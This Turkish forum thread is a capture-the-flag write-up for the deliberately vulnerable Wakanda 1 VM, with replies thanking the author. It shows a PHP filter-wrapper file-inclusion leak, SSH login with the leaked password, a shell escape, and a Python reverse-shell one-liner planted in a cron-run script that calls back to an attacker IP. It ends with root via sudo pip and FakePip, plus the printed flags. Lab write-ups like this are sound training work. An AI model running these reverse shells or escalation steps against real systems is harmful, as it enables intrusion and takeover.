Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm


Wakanda 1 Açıklı Makine Çözümü 'Rairsa

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 10-09-2018 18:05   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
-
Mesajlar
Konular

Teşekkür (Etti): 197
Teşekkür (Aldı): 59


Wakanda 1 Açıklı Makine Çözümü 'Rairsa




Merhaba THT ailesi
Sizlere bugün "Wakanda 1 Açıklı Makinesinin Çözümünü" anlatacağım


Wakanda 1'i buradan indirebilirsiniz.

Görevler;
1-Flag1 bulmak
2-Flag2 bulmak
3-root.txt bulmak


Programı kurduktan sonra Kali makinemize geçiyoruz ve terminale
Kod:
netdiscover
yazıyoruz



Not : Netdiscover programı ağınızda bulunan cihazları gösterir.

Resimde görüldüğü gibi açıklı makinemizin ip si "10.0.2.7"

Nmap ile ip'yi taratalım. Nmap ile taratmak için terminale
Kod:
nmap -A 10.0.2.7
yazıyoruz



Çıkan sonuçlarda 3333 portunda ssh çalıştığını ve 80 portunda apache çalıştığını gördük.
İp'mizi Firefox'a yazalım;



ve karşımıza bir market sayfası çıkıyor. CTRL ve U tuşuna basarak sayfanın kaynağına gidelim




Karşımıza HTML kodları çıkıyor. Bu sayfada ilk dikkatimi çeken bir yorum satırının bırakılmasıydı
Yorum satırında yazan "?lang=fr" yazan yeri url'mizin devamına yazalım
Yani ;

Kod:
10.0.2.7/?lang=fr


Sayfamız Fransızca ya dönüştü. Burada "?lang=" yerinden sonra php wrapperi yazalım ve index dosyasını almayı deniyelim

Kod:
php://filter/convert.base64-encode/resource=index


Karşımıza base 64 tipi şifre çıktı bu şifreyi kopyalayıp google'a base64 decode yazıyoruz ardından ilk siteye girip şifremizi yapıştırıyoruz.



Şifre den çıkanlar php kodları. Kodların en üstünde;
Kod:
$password ="Niamey4Ever227!!!" ;//I have to remember it
yazıyor.

Kodların en altında ise;
Kod:
<p>Made by<a href="#">@mamadou</a></p>
yazıyor.

Hatırlarsanız makinemizde 3333.cü portta SSH servisi açıktı;
SSH servisini çalıştırmak için gerekenler;
Kod:
ssh kullanıcıadı@ipadresi -p port
ve altına şifre girmemiz gerekiyor.
Php kodlarında şifreyi bulduk. Bize kullanıcı adı lazım. Kullanıcı adını ise php kodlarında en altta bulunan ve başında @ işareti olan mamadou kelimesini yazalalım;
Yani terminale ;
Kod:
ssh mamadou@10.0.2.7 -p 3333
yazıyoruz.
Şifre için : Niamey4Ever227!!! yazıyoruz



Sisteme sızmayı başardık ancak terminal komutları çalışmıyor. Uyarıları biraz daha detaylı okuduktan sonra bunun shell olduğunu anlıyorum.



Python shell'den çıkmak için terminale
Kod:
import pyt ardından pty.spawn("/bin/sh")
yazıyoruz.


Ardından "ls" yazıyoruz karşımıza flag1.txt adlı dosya çıkıyor.

Kod:
cat flag1.txt
komutu ile flag1.txt dosyasını okuyoruz.



Bayrağımızı bulduktan sonra "pwd" komutunu yazıyoruz ve nerede olduğumu öğreniyoruz.
"/home/mamadou"
"cd .." yazarak "home" dizinine gidiyoruz ve "ls" komutu ile dizinde başka neler olduğuna bakıyoruz.



Burada dikkatimi çeken "devops" yazması.
"cd devops" komutu ile devops klasörüne giriyoruz ve ls komutunu yazıyoruz karşımıza flag2.txt adlı bir dosya çıkıyor.




"cat" komutu ile dosyayı okumaya çalıştığımız zaman hata alıyoruz.



Ardından sistemde ikinci bir kullanıcı olup olmadığını kontrol etmek için
Kod:
cat /etc/passwd

komutunu terminale yazıyoruz ve dosyayı biraz inceledikten sonra dosyanın en altında "devops" adlı bir kullanıcının olduğunu görüyoruz.

Komut satırına
Kod:
find / -user devops
yazarak devops kullanıcısının dosyalarını görüyoruz.



Burada komutun hemen altında yazan "/srv/.antivirus.py" dosyası ilgimi çekiyor ve terminale
Kod:
nano /srv/.antivirus.py
yazyıyoruz.



Bu dosya python dosyası olduğu için buraya reverse shell kodu yazabiliriz.
Bunun için
BU siteden reverse shell kodlarını alıyoruz dosyanın içine yapıştırıyoruz.

Kod:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Not : 2. satırda parantezler içinde yazan 10.0.0.1 ip sini kendi ip adresimizle değiştiriyoruz ve yanında 1234 yazan port numarasını 4444 olarak değiştiriyoruz.
Not : İp adresini öğrenmek için terminale "ifconfig" yazıyoruz.



Ardından belirttiğimiz portu dinlemek için terminale
Kod:
nc -lvp 4444
yazıyoruz ve 4444 portunu dinliyoruz.

Biraz bekledikten sonra shell düşüyor ve artık makineye devops kullanıcısı ile girmiş oluyoruz.



Kod:
cat home/devops/flag2.txt
yazarak ikinci bayrağımıza erişiyoruz



Şimdi sıra root.txt dosyasını bulmaya geldi. root.txt dosyasını okumak için root olmamız gerekiyor.

Komut satırına
Kod:
sudo -l
yazıyoruz



Resimde de görüldüğü üzere "pip" servisi root haklarında çalışıyor. Biz "Fakepip" programı ile root olabiliriz.
Bunun için yeni bir terminal açıp

Kolaylık olması açısından "cd Desktop/" yazıyoruz

Ardından;
Kod:
git clone https://github.com/0x00-0x00/FakePip.git
yazıyoruz

Daha sonra terminale
cd FakePip
nano setup.py yazıyoruz ve setup dosyasının içine giriyoruz.

Burada "RHOST" yazan yere kendi ip adresimizi yazıyoruz. Ve CTRL + O tuşuna basarak dosyayı kaydediyoruz.




Ve setup.py dosyasını kopyalayıp /var/www/html dosyasının içine yapıştırıyoruz

Bunları yaptıktan sonra terminale ;

Kod:
service apache2 start
yazıyoruz

Devops kullanıcısının terminaline
Kod:
wget http://ipadresiniz/setup.py
yazıyoruz.



Not : Fakepip programı 443 numaralı portta çalışır
Yeni bir terminal açıyoruz ve içine;
Kod:
nc -lvp 443
yazıyoruz ve bu şekilde 443 numaralı portumuzu dinliyoruz

Tekrardan devops kullanıcısının terminaline

Kod:
sudo /usr/bin/pip install . -upgrade -force-reinstall
yazıyoruz.

Eğer her adımı doğru yaptıysanız 443. porttan root erişiminde olacaksınız.

Ve root terminaline
cd root
cat root.txt
yazarak root dosyasını okuyabilirsiniz



Flag1 : d86b9ad71ca887f4dd1dac86ba1c4dfc
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
Root: 821ae63dbe0c573eff8b69d451fb21bc


Yazıda anlamadığınız veya takıldığınız bir yer olursa özel mesaj yolu ile benimle iletişime geçebilirsiniz.
'Rarisa



___________________________________________

"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
 Offline  
 
Alıntı ile Cevapla
Teşekkür

LifeHacker, 'Flash, M3m0ry Teşekkür etti.
Alt 10-09-2018 18:06   #2
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893




Emeğine Sağlık
 Offline  
 
Alıntı ile Cevapla
Alt 10-09-2018 18:06   #3
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
05/2018
Mesajlar
Konular

Teşekkür (Etti): 68
Teşekkür (Aldı): 358




Emeğinize sağlık güzel paylaşım
 Offline  
 
Alıntı ile Cevapla
Alt 10-09-2018 18:07   #4
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
09/2017
Yaş
29
Mesajlar
Konular

Teşekkür (Etti): 631
Teşekkür (Aldı): 368




Eline emeğine sağlık.
 Offline  
 
Alıntı ile Cevapla
Alt 10-09-2018 19:05   #5
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
-
Mesajlar
Konular

Teşekkür (Etti): 197
Teşekkür (Aldı): 59




Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Emeğine Sağlık
Alıntı:
theokeleS´isimli üyeden Alıntı Mesajı göster
Emeğinize sağlık güzel paylaşım
Alıntı:
oldnco´isimli üyeden Alıntı Mesajı göster
Eline emeğine sağlık.
Teşekkür ederim



___________________________________________

"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
 Offline  
 
Alıntı ile Cevapla
Alt 10-09-2018 19:10   #6
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
05/2013
Mesajlar
Konular

Teşekkür (Etti): 132
Teşekkür (Aldı): 117




Güzel farklı olmuş eline sağlık.



___________________________________________

"Bir millet eğitim ordusuna sahip olmadıkça, savaş meydanlarında ne kadar parlak zaferler elde ederse etsin, o zaferlerin kalıcı sonuçlar vermesi ancak eğitim ordusuyla mümkündür."

M.KEMAL ATATÜRK
 Offline  
 
Alıntı ile Cevapla
Alt 10-09-2018 20:01   #7
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
-
Mesajlar
Konular

Teşekkür (Etti): 197
Teşekkür (Aldı): 59




Alıntı:
LifeHacker´isimli üyeden Alıntı Mesajı göster
Güzel farklı olmuş eline sağlık.
Teşekkürler (:



___________________________________________

"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
 Offline  
 
Alıntı ile Cevapla
Alt 16-09-2018 18:28   #8
  • İstihbarat Timi
  • Üye Bilgileri
Üyelik tarihi
07/2009
Mesajlar
Konular

Teşekkür (Etti): 99
Teşekkür (Aldı): 2202




Ellerine sağlık
 Offline  
 
Alıntı ile Cevapla
Alt 18-09-2018 17:35   #9
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
-
Mesajlar
Konular

Teşekkür (Etti): 197
Teşekkür (Aldı): 59




Alıntı:
"Squ4LL´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık
Teşekkür ederim komutanım



___________________________________________

"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
 Offline  
 
Alıntı ile Cevapla
Alt 22-09-2018 19:47   #10
  • Siber Güvenlik Ekibi Sorumlusu
  • Üye Bilgileri
Üyelik tarihi
04/2016
Nereden
Ötüken
Mesajlar
Konular

Teşekkür (Etti): 123
Teşekkür (Aldı): 2900




Eline sağlık Rairsa bu tür konuları görmek güzel



___________________________________________


ceys@thtmoderasyon.com
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau